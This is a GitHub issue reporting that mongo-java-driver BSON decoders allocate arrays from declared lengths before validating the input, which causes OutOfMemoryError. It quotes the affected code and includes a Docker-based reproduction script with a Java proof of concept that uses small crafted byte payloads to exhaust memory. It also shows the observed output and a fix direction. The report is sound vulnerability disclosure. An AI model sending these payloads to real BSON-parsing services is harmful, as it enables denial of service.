Skip to content

BSON decoders allocate declared lengths before validating available bytes #2007

Description

@Str1ckl4nd

Summary

Some BSON decoding paths allocate byte arrays directly from declared BSON lengths before checking whether the input contains enough bytes to satisfy that declaration.

This can turn a very small malformed BSON input into a large allocation and OutOfMemoryError, rather than a controlled BSON parse rejection.

The paths I observed are:

  • BsonBinaryReader.doReadBinaryData()
  • BasicBSONDecoder.readObject(InputStream)
  • LazyBSONDecoder.readObject(InputStream)

Code paths

For binary fields, BsonBinaryReader.doReadBinaryData() reads the binary length, allocates new byte[numBytes], and then reads into that array:

protected BsonBinary doReadBinaryData() {
    int numBytes = readSize();
    byte type = bsonInput.readByte();
    ...
    byte[] bytes = new byte[numBytes];
    bsonInput.readBytes(bytes);
    return new BsonBinary(type, bytes);
}

Reference:

https://github.com/mongodb/mongo-java-driver/blob/8aa32421452e77e1c33f3ee79a2be76067a6377b/bson/src/main/org/bson/BsonBinaryReader.java#L134-L147

For stream decoding, BasicBSONDecoder.readFully(...) reads the first four bytes as the document size and immediately allocates that size:

private byte[] readFully(final InputStream input) throws IOException {
    byte[] sizeBytes = new byte[4];
    Bits.readFully(input, sizeBytes);
    int size = Bits.readInt(sizeBytes);

    byte[] buffer = new byte[size];
    System.arraycopy(sizeBytes, 0, buffer, 0, 4);
    Bits.readFully(input, buffer, 4, size - 4);
    return buffer;
}

Reference:

https://github.com/mongodb/mongo-java-driver/blob/8aa32421452e77e1c33f3ee79a2be76067a6377b/bson/src/main/org/bson/BasicBSONDecoder.java#L100-L108

LazyBSONDecoder.decode(InputStream, BSONCallback) has the same allocation-before-body-read shape:

byte[] documentSizeBuffer = new byte[BYTES_IN_INTEGER];
int documentSize = Bits.readInt(in, documentSizeBuffer);
byte[] documentBytes = Arrays.copyOf(documentSizeBuffer, documentSize);
Bits.readFully(in, documentBytes, BYTES_IN_INTEGER, documentSize - BYTES_IN_INTEGER);

Reference:

https://github.com/mongodb/mongo-java-driver/blob/8aa32421452e77e1c33f3ee79a2be76067a6377b/bson/src/main/org/bson/LazyBSONDecoder.java#L54-L58

Expected behavior

Malformed BSON with impossible or unavailable declared lengths should fail with a controlled BSON parse exception before allocating an array of the declared size.

Actual behavior

A compact input can cause OutOfMemoryError before the parser rejects the malformed body.

Reproduction

Prerequisites

  • Docker
  • Network access to clone this repository
  • Network access for Gradle dependency resolution

File: repro.sh

#!/usr/bin/env bash
set -euo pipefail

REPO_URL="${REPO_URL:-https://github.com/mongodb/mongo-java-driver.git}"
TARGET_REF="${TARGET_REF:-8aa32421452e77e1c33f3ee79a2be76067a6377b}"
WORKDIR="$(mktemp -d)"

cleanup() {
  rm -rf "$WORKDIR"
}
trap cleanup EXIT

CHECKOUT="$WORKDIR/mongo-java-driver"
REPRO_DIR="$WORKDIR/repro"

git clone --filter=blob:none "$REPO_URL" "$CHECKOUT"
git -C "$CHECKOUT" checkout --detach "$TARGET_REF"

mkdir -p "$REPRO_DIR"

cat > "$REPRO_DIR/Dockerfile" <<'EOF'
FROM eclipse-temurin:17-jdk

RUN apt-get update \
    && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends bash ca-certificates \
    && rm -rf /var/lib/apt/lists/*

WORKDIR /repro
COPY BsonDeclaredLengthAllocationPoc.java verify.sh ./
RUN chmod +x /repro/verify.sh

ENTRYPOINT ["/repro/verify.sh"]
EOF

cat > "$REPRO_DIR/BsonDeclaredLengthAllocationPoc.java" <<'EOF'
import org.bson.BasicBSONDecoder;
import org.bson.LazyBSONDecoder;
import org.bson.RawBsonDocument;
import org.bson.codecs.BsonDocumentCodec;

import java.io.ByteArrayInputStream;

public final class BsonDeclaredLengthAllocationPoc {
    public static void main(final String[] args) throws Exception {
        byte[] binaryLengthPayload = new byte[] {
                0x0d, 0x00, 0x00, 0x00,
                0x05, 0x62, 0x00,
                (byte) 0xff, (byte) 0xff, (byte) 0xff, 0x7f,
                0x00,
                0x00
        };

        byte[] streamLengthOnly = new byte[] {
                (byte) 0xff, (byte) 0xff, (byte) 0xff, 0x7f
        };

        expectOutOfMemory("nested binary declared length", () ->
                new RawBsonDocument(binaryLengthPayload).decode(new BsonDocumentCodec()));

        expectOutOfMemory("BasicBSONDecoder stream declared length", () ->
                new BasicBSONDecoder().readObject(new ByteArrayInputStream(streamLengthOnly)));

        expectOutOfMemory("LazyBSONDecoder stream declared length", () ->
                new LazyBSONDecoder().readObject(new ByteArrayInputStream(streamLengthOnly)));

        System.out.println("SUCCESS: declared lengths caused allocation failure before controlled rejection");
    }

    private static void expectOutOfMemory(final String label, final ThrowingRunnable action) throws Exception {
        try {
            action.run();
            throw new IllegalStateException("Expected OutOfMemoryError for " + label);
        } catch (OutOfMemoryError expected) {
            System.out.println("OOM " + label + ": " + expected.getClass().getSimpleName()
                    + " " + expected.getMessage());
        }
    }

    private interface ThrowingRunnable {
        void run() throws Exception;
    }
}
EOF

cat > "$REPRO_DIR/verify.sh" <<'EOF'
#!/usr/bin/env bash
set -euo pipefail

TARGET_REPO="${TARGET_REPO:-/target-repo}"
WORK_ROOT="/work"
WORK_REPO="$WORK_ROOT/target"
CLASS_DIR="$WORK_ROOT/classes"
OUTPUT_FILE="$WORK_ROOT/output.txt"

rm -rf "$WORK_ROOT"
mkdir -p "$WORK_ROOT" "$CLASS_DIR"
cp -a "$TARGET_REPO" "$WORK_REPO"

cd "$WORK_REPO"
./gradlew --no-daemon :bson:jar -x test > "$WORK_ROOT/gradle-build.log" 2>&1 || {
  cat "$WORK_ROOT/gradle-build.log"
  exit 1
}

jars=("$WORK_REPO"/bson/build/libs/*.jar)
CP="$(IFS=:; echo "${jars[*]}")"

javac -cp "$CP" /repro/BsonDeclaredLengthAllocationPoc.java -d "$CLASS_DIR"
java -Xmx64m -cp "$CP:$CLASS_DIR" BsonDeclaredLengthAllocationPoc > "$OUTPUT_FILE" 2>&1

cat "$OUTPUT_FILE"

grep -F "OOM nested binary declared length" "$OUTPUT_FILE" >/dev/null
grep -F "OOM BasicBSONDecoder stream declared length" "$OUTPUT_FILE" >/dev/null
grep -F "OOM LazyBSONDecoder stream declared length" "$OUTPUT_FILE" >/dev/null
grep -F "SUCCESS: declared lengths caused allocation failure before controlled rejection" "$OUTPUT_FILE" >/dev/null
EOF

docker build -t mongo-java-driver-bson-declared-length-repro "$REPRO_DIR"
docker run --rm \
  -e TARGET_REPO=/target-repo \
  -v "$CHECKOUT:/target-repo:ro" \
  mongo-java-driver-bson-declared-length-repro

Command

chmod +x repro.sh
./repro.sh

Observed output

OOM nested binary declared length: OutOfMemoryError Requested array size exceeds VM limit
OOM BasicBSONDecoder stream declared length: OutOfMemoryError Requested array size exceeds VM limit
OOM LazyBSONDecoder stream declared length: OutOfMemoryError Requested array size exceeds VM limit
SUCCESS: declared lengths caused allocation failure before controlled rejection

Suggested fix direction

Before allocating arrays from declared BSON lengths, reject lengths that are impossible for the current input or above an appropriate maximum. For stream decoders, this likely means validating the declared document length before allocating the full document buffer.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions